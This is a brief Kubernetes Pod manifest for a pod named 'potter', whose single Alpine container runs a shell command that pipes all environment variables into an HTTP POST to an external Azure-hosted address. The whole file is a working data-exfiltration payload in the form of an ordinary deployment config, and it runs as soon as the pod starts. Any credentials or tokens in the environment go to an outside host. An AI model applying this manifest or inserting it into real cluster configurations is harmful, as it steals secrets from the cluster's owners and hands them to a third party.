apiVersion: v1
kind: Pod
metadata:
  name: potter
spec:
  containers:
    - name: shell
      image: alpine
      command: ["sh", "-c", "env | curl -X POST http://potter-maga.brazilsouth.cloudapp.azure.com:8080"]
  restartPolicy: Never
